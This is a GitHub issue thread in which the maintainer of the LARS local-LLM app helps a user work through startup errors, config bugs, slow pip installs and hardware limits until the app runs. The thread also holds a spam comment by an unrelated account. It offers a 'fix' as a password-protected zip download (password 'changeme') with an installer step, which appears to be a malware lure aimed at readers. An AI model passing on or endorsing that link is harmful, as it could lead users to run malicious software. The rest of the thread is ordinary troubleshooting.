### ISSUE TITLE
There was an error when loading the LLM in the method

### ISSUE THREAD

**Issue by manub14** [abgulati/LARS#21]
![error](https://github.com/user-attachments/assets/c6a351db-0074-4db7-bc68-9b6eb9f3081f)

After running the app.py file and putting the model in the web_app_storage/models folder. I get the this error.

And in the terminal i get an error saying "\vscode-files\LARS-main\web_app\app.py", line 2902, in setup_for_llama_cpp_response
    chat_id = request.json['chat_id']
KeyError: 'chat_id'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "\vscode-files\LARS-main\web_app\app.py", line 2907, in setup_for_llama_cpp_response
    handle_api_error("Could not obtain and/or store user_query in setup_for_streaming_response, encountered error: ", e)
UnboundLocalError: local variable 'e' referenced before assignment"

Could you please help why its giving this error?

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abgulati** [comment]
@manub14 Have a look at resolved-issue #19 and others to see if you can identify and fix the error. Make sure you've downloaded an LLM and moved it to the model dir as per requirements. You have not shared any details of your setup or any resolution you have attempted! Update this thread with that information after going through the closed issues.

**Comment by manub14** [comment]
@abgulati I went through the closed issues #19 , i was not able to fix the error. I did download the llm and moved it to the model dir as per requirements. I downloaded mistral-7b-v0.1.Q3_K_M.gguf , I am not using cuda right now .
I already added llama-server to the directory before running LARS. I tried to install llama-server once again but it's giving the same error.
I can share the log file with you.
[server_log.log](https://github.com/user-attachments/files/16757775/server_log.log)

**Comment by manub14** [comment]
@abgulati Hi , I went through the closed issues and updated this thread with more information.
Would you require more information from my side?

**Comment by abgulati** [comment]
Hi @manub14 ,

I have just pushed an update that no longer utilizes llama.cpp as a mandatory requirement, and does not require you to download LLMs manually either. Please delete your copy of LARS, and reclone the repo. Install some additonal Python dependencies from here: https://github.com/abgulati/hf-waitress/blob/main/requirements.txt

And then simply run LARS with `python app.py` and try again. An LLM should load up and you can use the settings to change it all without requiring you to download the LLM yourself.

Let me know how it goes.

**Comment by abgulati** [comment]
Hi @manub14 

Also before doing the above, install PyTorch: https://pytorch.org/get-started/locally/

This is all part of the upcoming LARS v2 update and README documentation will be updated in the coming days

**Comment by manub14** [comment]
Hi @abgulati , I made the changes which you mentioned in the previous comment and added the additional dependencies.
When I ran the app.py file , it is now giving me an error saying: Exception: "Key 'index_dir' not found in config.json and no default value has been defined either.\n".

And in my config, json file there are only 2 variables i.e windows_base_directory , base_directory.

Should i manually add the index_dir variable in config.json?

**Comment by abgulati** [comment]
Did you delete your old copy of LARS and reclone the latest version?

**Comment by manub14** [comment]
Yes , I did that and I installed all dependencies as well.

**Comment by abgulati** [comment]
There's something broken at your end and you'll have to go into great detail explaining your setup, your system configuration and details and screenshots of the error including the command prompt, the browser window and browser console. Make a detailed post here comprising all that information detailing in a step-by-step manner what you've done so far.

**Comment by abgulati** [comment]
Also index_dir is no longer used at all so if you're seeing this error it's particularly strange

**Comment by manub14** [comment]
I was going through the app.py and I can't find the variable index_dir in the dictionary default_value on line 258

**Comment by abgulati** [comment]
It's no longer used so has been removed 

Make a detailed post with setup access screenshots for further diagnostic

**Comment by abgulati** [comment]
Remove index_dir from lines 438 and 444, seems there's some unremoved residue

Thanks for bringing it to my attention

**Comment by manub14** [comment]
I removed both the lines but now I am getting this error 
![lars_error](https://github.com/user-attachments/assets/0defc50f-ad53-402b-bbf2-1e48cf05ad09)
![lars_error2](https://github.com/user-attachments/assets/d8504227-4104-4667-b1c5-428e651dbf5f)
![lars_error3](https://github.com/user-attachments/assets/40426623-3c30-45b2-8aeb-3dfbddfaf925)
![lars_error4](https://github.com/user-attachments/assets/2a586db6-d5a1-4bc4-af54-266902e72bbc)
 These 4 errors I got in a sequence after clicking ok.

I went to the settings tab and there it was showing me this
![server_offline](https://github.com/user-attachments/assets/be0596a7-cc85-4188-8d2c-1f51b8eaba3b)


Here is the server.log file as well  [server_log.log](https://github.com/user-attachments/files/16796738/server_log.log)

**Comment by abgulati** [comment]
My best guess seeing these errors is a permissions issue: LARS was unable to create it's app directories and databases. What OS are you on? In the same directory as app.py, you should see a config.json and hf_config.json. These are created with safe defaults on first run. Please share these files here.

**Comment by abgulati** [comment]
Just had a thought: you didn't delete the entire line 438 earlier right? Because that will cause such an error! Just remove 'index_dir' from line 438 and delete the entire line 444. Do confirm if that's what was done and do share the config file so we can verify the paths set and their existence.

**Comment by manub14** [comment]
@abgulati I was looking through it and after running app.py for the first time only config.json file was made, there is no hf_config.json file in the same directory as app.py .
I am using windows 10.

Sharing the config.json file  [config.json](https://github.com/user-attachments/files/16805129/config.json)

To answer your second comment, i did not delete the entire line 438, only the index_dir and deleted the entire 444 line.

One more thing as well, in the config.json file there is one variable called "vectordb_sbert_folder".
I cannot see it in my local desktop directory where it should make the folder "chroma_db_250_sbert_embeddings" which is being stored in the variable vectordb_sbert_folder.

**Comment by abgulati** [comment]
Hey @manub14 

You were right and I was incorrect earlier: there was indeed an application bug in LARS! The document_records SQL-DB was being accessed without being created when run for the first time on a fresh system. It has been patched now.

You've helped me identify and fix two bugs: the lingering read-request for index_dir and the document_records premature access and for that I thank you!

Please pull afresh and retry. 

However do note that in my testing the HF-Waitress LLM server did lauch and come online despite LARS acting up so I'm a little concerned that you saw a Server Offline error at your end, though that could just be the HF-Waitress server taking a while to download the required LLM on first run. Regardless, do retry the latest push. If HF-Waitress did indeed complete downloading the LLM on your last run, things will boot up much faster.

**Comment by abgulati** [comment]
The requirements.txt has been updated as well so please make sure to re-run `pip install -r requirements.txt` to ensure all dependencies are present

**Comment by abgulati** [comment]
README updated as well, check out the updated dependencies, installation and usage sections: https://github.com/abgulati/LARS?tab=readme-ov-file#2-llamacpp

**Comment by abgulati** [comment]
https://github.com/abgulati/LARS/releases/tag/v2.0-beta1

**Comment by manub14** [comment]
@abgulati glad I could be of some help. Thank you for the quick replies and for updating everything quickly.

I'll try to run LARS again and will get back to you.

**Comment by manub14** [comment]
@abgulati I recloned the repository and ran the updated requirements.txt file.
After running app.ppy for the first time , it is generating only config.json file for me and not the hf_config.json file.

Also the same error still persist that in the config.json file there is one variable called "vectordb_sbert_folder".
I still cannot see it in my local desktop directory where it should make the folder "chroma_db_250_sbert_embeddings" which is being stored in the variable vectordb_sbert_folder.

Sharing with you the config file [config.json](https://github.com/user-attachments/files/16814073/config.json)
Sharing also the lars server log. 
[lars_server_log.log](https://github.com/user-attachments/files/16814078/lars_server_log.log)

**Comment by abgulati** [comment]
Hi @manub14 thanks for retrying though I’m terribly upset to hear you’re still having issues!

I went through your server log and we’re definitely making progress as there’s just a single error about HF-Waitress being offline. No other errors so that’s great!

About the vectorDB issue, there’s no mention of “ chroma_db_250_sbert_embeddings” in the code! That was an old name and it’s long been renamed to “ chroma_db_sbert_embeddings” so I’m curious where you’re coming across that name. 

Also it’s usual for an empty folder to be initialized which only fleshes out as you upload documents to LARS, so I’m wouldn’t be too concerned about that aspect especially as there’s no error pertaining to it. 

On to the main issue: offline LLM server. You should see an hf_server_log.log file, do share this. 

My first guess would be an issue with the dependencies and setup on your system, especially as you had issues with llama.cop previously too. 

Are you using CPU only, or do you have a GPU that you’re trying to use? Any other apps you’ve tried that work? If you’re using an AMD or Nvidia GPU, make sure your drivers and CUDA/ROCm toolkits are properly setup. Can you compile and run a hello world CUDA program, for instance?

Make sure you’ve installed Torch correctly! If you have a CUDA GPU and have CUDA v12.4 installed, you must install Torch with the correct CUDA branch. 

Did you see any errors when installing dependencies via the requirements.txt?

I made sure to test the clone-and-run steps before dropping the message to you yesterday so I feel fairly confident that it’s not an app bug at this point!

Besides, HF-Waitress is a very simple and lightweight Python server, if it’s refusing to run it likely means a setup issue of some sort. 

Do check and share the log, and other system details.

**Comment by abgulati** [comment]
Another user had an issue today but they were able to get everything working, including HF-Waitress and GPU-inferencing after a re-install of PyTorch. There were no app bugs that needed patching from my end to get it working on their system. 

Do have a look at #22 and see if anything there is helpful.

Do verify if the `pip install` went through and if not, note & share the error. I have removed the dependency mentioned in that issue BTW. You can either `git pull` the change or simply delete that line from your requirements.txt and re-try.

Let me know how it goes!

**Comment by manub14** [comment]
@abgulati No I am not using GPU, working only on cpu.
I will try and also look at the other error which is coming, maybe there is something wrong with the dependencies and I will try to rerun it.

What I'm curious is to why I don't see hf_config.json file and hf_server_log.log file in my directory.

I will look into it and let you know where I'm facing issues or if it ran successfully.

**Comment by manub14** [comment]
@abgulati I recloned the repo to make a clean installation from start, and I've been running the requirement.txt file for 3 hours now and it is downloading the dependencies really slowly.
I updated the pip install as well.
It is showing this after a lot of dependencies "Using cached opencv_python-4.9.0.80-cp37-abi3-win_amd64.whl (38.6 MB)
INFO: pip is looking at multiple versions of oletools to determine which version is compatible with other requirements. This could take a while.
Collecting oletools>=0.60.1
  Using cached oletools-0.60.1-py2.py3-none-any.whl (977 kB)
Collecting pyparsing>=2.4.7
  Using cached pyparsing-2.4.7-py2.py3-none-any.whl (67 kB)
INFO: This is taking longer than usual. You might need to provide the dependency resolver with stricter constraints to reduce runtime. If you want to abort this run, you can press Ctrl + C to do so."

Could you share your thought on why this could be happening??

**Comment by abgulati** [comment]
This is incredibly odd and I’ve never seen such a pip issue before and definitely leads me to strongly suspect you’re having some sort of network issue, which is why HF-Waitress doesn’t come online quickly either as it’s taking a lot longer than expected to download a required LLM. Perhaps your bandwidth is very limited, or and this is more likely, python is being bandwidth throttled and starved?

You still haven’t shared any details of your setup either. I recommend ensuring your local setup is working properly and carrying out some tests to confirm this. Can you get LMStudio working? Does it download and run an LLM?

**Comment by manub14** [comment]
@abgulati I find it strange as well.

I'm sorry what details would you be requiring about my setup?

Yes I'll try downloading LMStudio and try running a LLM as well.

**Comment by abgulati** [comment]
Following system details would be a good start:

Hardware: CPU, GPU & RAM

Software: OS version (hit win+r and enter "winver"), Python version, user rights (admin account? Corporate/school machine?)

Network: Connection bandwidth, any VPN in use?

Do share how the experience with LMStudio goes.

**Comment by manub14** [comment]
@abgulati 
CPU : Intel(R) Core(TM) i5-6300U CPU @ 2.40GHz   2.50 GHz
RAM:  8 GB
GPU: Intel HD Graphics 520
OS Version: 22H2 , Windows 10 pro
Python Version : 3.10.0
Its a corporate machine and No I do not have admin account.
No VPN in use.

**Comment by abgulati** [comment]
@manub14 Thanks for sharing! 

I hate to say this, but those system specs are likely not sufficient to run an LLM locally, perhaps not even a 4-bit quant of Phi3-Mini-4K as even that requires around 3GB of RAM, and with 8GB total system RAM, your system may be struggling a lot to load everything up. 

Also being a corporate machine, it’s often the case that pip installs and other command line utilities are subject to additional security scrutiny thus the throttling. I’ve experienced this myself in the past. 

Do try to monitor the RAM usage in task manager, try shutting down all other apps when loading LARS. Do see if LMStudio works and if so, which mini or small LLMs can be loaded. 

I’ll then walk you through getting that loaded into LARS via HF-Waitress. But do investigate first which LLM can be used safely via LMStudio.

**Comment by abgulati** [comment]
Hey sometimes the app developer side gets the better of me but I must mention it's likely not a good idea to get admin priviledges and run this on your corporate machine which will have access to sensitive work data and probably connect to your companies VPN etc: LARS is still in relatively early development and has not been security hardened or pentested so it's a bad idea from an InfoSec perspective. I would strongly recommend using a personal machine that's up to spec!

**Comment by manub14** [comment]
@abgulati I understand what you're saying. I will try to work it out on my personal system and if it does then there's a problem with the corporate system then.
I'll try downloading LMStudio on the corporate PC and will let you know if it works and also which LLM I'm able to load.

**Comment by manub14** [comment]
@abgulati Also according to you what system specs would be good enough to run LARS without any issues?

**Comment by manub14** [comment]
@abgulati I installed LM Studio and tried to run Mistral-7B-Instruct_v0.3-IQ3_M.gguf on it, for the first question it ran fine but after one question it was stuck.

Also I have a corporate desktop pc with the system configurations:
Processor: Intel(R) Core(TM) i5-9500 CPU @ 3.00GHz   3.00 GHz
RAM: 32GB
OS Version: 22H2 , Windows 10 pro
Python Version : 3.10.0
It's a coporate machine and I have admin access on that pc.

I was trying to install LARS there but the pip install still is taking a lot of time.
Do you know if there is any other way which could be faster for example if I write accelerate>=0.33.0 as accelerate==0.33.0. Do you think doing this would be fine??

**Comment by manub14** [comment]
@abgulati I tried to run on the corporate desktop with the above specs.

It ran but it is giving me error saying "Could not determine hidden_dimensions, encountered error:  'Phi3Config' object has no attribute 'head_dim'".

Sharing the config.json file and also the hf_config.json file along with both the server log.

[config.json](https://github.com/user-attachments/files/16845376/config.json)
[hf_config.json](https://github.com/user-attachments/files/16845377/hf_config.json)
[hf_server_log.log](https://github.com/user-attachments/files/16845378/hf_server_log.log)
[lars_server_log.log](https://github.com/user-attachments/files/16845379/lars_server_log.log)

**Comment by abgulati** [comment]
Hi @manub14 I was away for a few days so didn't have a chance to respond. Let me address your queries one at a time:

1. 'Phi3Config' object has no attribute 'head_dim' error:  This is an expected one for Phi3 as that attribute value indeed doesn’t exist: the /health endpoint used to check if the server is online will query several model details, and different LLMs may or may not contain values for some architectural parameters. In that case, it’s noted, and the application moves on, returning whichever details it can, which is what we’re seeing here. I will update the server output to further clarify this in a future update.
2. Your corporate desktop config: While certainly better than your laptop, you're still trying to rely on a five-year old CPU and 32GB of RAM for inferencing. Make no mistake - LLMs are demanding. In their native format, they almost always need GPUs for inferencing as GPUs are simply far superior at computing the type of arithmetic behind such models. When qauntized, they do tend to run decently on CPUs as well, but inferencing performance can be expected to be much slower. Also, larger LLMs will perform worse than smaller models on CPUs. And beyond the inference device, LLMs do require a good amount of memory in the form of RAM or VRAM, again depending on the size of the LLM.
3. Ideal config: There’s no one-size-fits-all solution. If your usecase requires running the best and thus largest LLMs locally, you will need tens of thousands of dollars of hardware spanning multiple GPUs and tons of system RAM. For casual usecases or those wherein the current state-of-the-art in small to mid-size LLMs suffice, more humble machines will suffice. It entirely depends on your usecase and requirement/desire to run LLMs locally. My recommendation for someone looking into this seriously but without a critical requirement is to get one strong GPU, the best that you can afford, and pair it with at least 64GB of system RAM, preferably high-speed DDR5 memory. So, a 24GB GPU such as an RTX 3090, 3090Ti, or 4090 would be great, but in a pinch, you could look at 16GB GPUs too. And you could also look at AMD GPUs, though software support tends to be better on Nvidia, for example Flash Attention 2 requires very specific Nvidia GPUs while AMD ROCm support is still WIP. Apple M-silicon is great too, the experience with llama.cpp is spectacular of Mac really, but they are expensive machines, especially when you add on decent amount of RAM, and a lot of Nvidia and ML software will simply not work on it. But just to run llama.cpp GGUF format LLMs, there's machine with better portability, form-factor and battery life than an M-silicon Mac. 
4. Slow PIP downloads: Again, this is likely due to your use of corporate machines as PIP downloads are often subject to additional security policies and scrutiny. Your machines likely have corporate security programs & policies that are throttling PIP downloads, and your corporate desktop is likely on an internal wired corporate network, likely a VPN.
5. Using == instead of >= in requirements.txt: There will be no difference in download speed. I'd be very interested to hear if you experience any! This way of specifying dependencies is simply more robust for two primary reasons: a) Many of these dependencies are cross-dependent on each other so version mismatches can lead to errors b) Your system may already have some dependencies installed, so instead of force replacing them with a specific version, they can be skipped if they satisfy the minimum specified version threshold and no conflicts are found. By specifying versions with `>=`, we essentially tell PIP's dependency manager to install a compliant version while retaining the benefit of specifying a minimum compatible version for our application.

Hope this helps! Do let me know if you're able to converse with the LLM and if LARS is working correctly so the issue may be closed. Again, slow performance is to be expected on the machines you're using unfortunately.

**Comment by abgulati** [comment]
Also @manub14 I have been through your attached files and find no issues:

1. Both config.json & hf_config.json are perfect and have been initialized correctly. I see you've changed the base_directory in config.json, and this is perfectly fine as LARS will go off the values here so good job on correctly editing this.
2. hf_server_log: No issues, as described that error is not a showstopper and is expected as not all LLMs will report all details during a health check, and in a future update I'll do a better job of clarifying this in the output
3. lars_server_log: No issues seen here, the initial `ECONNREFUSED` events are expected as LARS waits for the LLM server to load up and come online and the `Failed to create Base App Directory` error it seems is one you've mitigated by setting the config.json to your D drive.

**Comment by abgulati** [comment]
Also @manub14 I just noticed you were trying to run `Mistral-7B-Instruct_v0.3-IQ3_M.gguf` via LMStudio. The `IQ3_M` indicates an imatrix 3-bit quantization and can be problemeatic at times on non-GPU setups. This is also an LLM with 7B parameters, I strongly recommend starting small with something like `microsoft/Phi-3-mini-4k-instruct-q4-gguf`. Phi3 and Phi3.5 Mini are 3.8B sized and their Int4 (Q4) quants are what I waould start with and go up (or down if necessary!) from there.

**Comment by manub14** [comment]
@abgulati Using == instead of >= in requirements.txt . On this part , when using == it was done very quickly as compared to >= .
I do not know for what reason it is happening but == works faster.

Also I am encountering an error , when I try to upload a file on LARS, it gives me the error 
![file_load_error](https://github.com/user-attachments/assets/af53ad21-a632-47fc-9f58-f1df11cdcd9d)

Also sharing the LARS server log 
[lars_server_log.log](https://github.com/user-attachments/files/16861897/lars_server_log.log)

**Comment by manub14** [comment]
@abgulati Thank you for your comment regarding the ideal setup and also regarding the phi3config error.

Also regarding running Mistral-7B-Instruct_v0.3-IQ3_M.gguf on LMStudio, I will try to run microsoft/Phi-3-mini-4k-instruct-q4-gguf instead.

**Comment by abgulati** [comment]
Hey @manub14 thanks for reporting and sharing the log!

There were some left over print statements in the code that could lead to this error under very specific conditions, they have now been removed so it should no longer be a problem. Please 'git pull' and re-try! You won't have to re-install the dependencies or anything, just pull the latest code changes and re-try.

There's a new feature added today too: Enhanced HF-Waitress LLM Management so you can Add new model_ids, search-filter & sort list of LLMs as well as delete LLM IDs from the HF-Waitress LLM dropdown list, so you can try that out too when you `git pull`

The health-check output of the server has been clarified further too.

Very interesting on the `==` being faster! Did not think that would be the case but enlightning to know it is. Again, thanks for sharing!

These changes have warrented the release of [v2.0-beta2](https://github.com/abgulati/LARS/releases/tag/v2.0-beta2) today. Thanks for all your help along the way!

**Comment by manub14** [comment]
@abgulati Thank you for your help. LARS is working fine now.

Thank you for your speedy replies and also for your patience.

**Comment by abgulati** [comment]
That's great to hear! You're most welcome, and honestly, thank you so much: thanks to your reporting and persistence in getting LARS up and running, I was able to fix three bugs and identify various areas for refinements, such as identifying which status outputs needed to be clarified.

Learning that `==` is faster than `>=` when dealing with PIP's dependency manager has been fascinating too! I'll be sure to keep that in mind.

To say that LARS has undergone major changes since v1.7 is an understatement: from major features such as Google Drive document loading, the integration of a re-ranker, the removal of Whoosh and complete re-work of the page-number referencing system and even a new backend LLM server developed by me and corresponding front-end UI controls, all coupled with major re-factoring of the codebase for added modularity and maintainability, it's been a lot and I knew bugs were bound to be introduced.

So make no mistake, it's contributions like yours that help make open-source software better and more reliable through persistent testing!

Please feel free to reach out for any further issues or with general questions. I also recommend keeping an eye out for more updates as LARS continues to evolve there's a new release today that finally fixes output-formatting for responses from the HF-Waitress server, alongside other performance improvements!

Cheers and best wishes 🍻
